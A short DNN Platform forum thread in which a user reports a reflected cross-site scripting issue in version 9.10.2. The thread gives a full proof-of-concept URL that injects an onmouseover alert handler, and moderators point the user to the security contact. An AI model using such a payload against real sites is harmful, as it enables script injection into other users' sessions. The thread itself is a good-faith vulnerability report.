DNN Forums

cross site attack

You are not authorized to post a reply.

Sort:

Author

Messages

New Member

Posts:3

13 May 2022 06:55 PM

Version allow url like http://dnndev.me:8091/Activity-Feed/userId/1/%22onmouseover=%22alert(0x01D39D)

Response is "http://dnndev.me:8091/Activity-Feed/userId/1?%22onmouseover=%22alert(0x01D39D)" and it is injected on form's post

Veteran Member

Posts:1191
Veteran Member

13 May 2022 10:48 PM

Which version of DNN are you using?

New Member

Posts:3

16 May 2022 10:38 AM

9.10.2

Thanks

Veteran Member

Posts:558

17 May 2022 02:48 AM

Please report (suspected) security issues at [email protected]

Regards,
Tycho de Waard

Tjep's digital agency
We just love DNN
https://www.tjeps.com

You are not authorized to post a reply.

These Forums are dedicated to discussion of DNN Platform.

For the benefit of the community and to protect the integrity of the ecosystem, please observe the following posting guidelines:

If you have (suspected) security issues, please do not post them in the forums but send an email to [email protected]
No Advertising. This includes promotion of commercial and non-commercial products or services which are not directly related to DNN.
No vendor trolling / poaching. If someone posts about a vendor issue, allow the vendor or other customers to respond. Any post that looks like trolling / poaching will be removed.
Discussion or promotion of DNN Platform product releases under a different brand name are strictly prohibited.
No Flaming or Trolling.
No Profanity, Racism, or Prejudice.
Site Moderators have the final word on approving / removing a thread or post or comment.
English language posting only, please.

Awesome! Simply post in the forums using the link below and we'll get you started.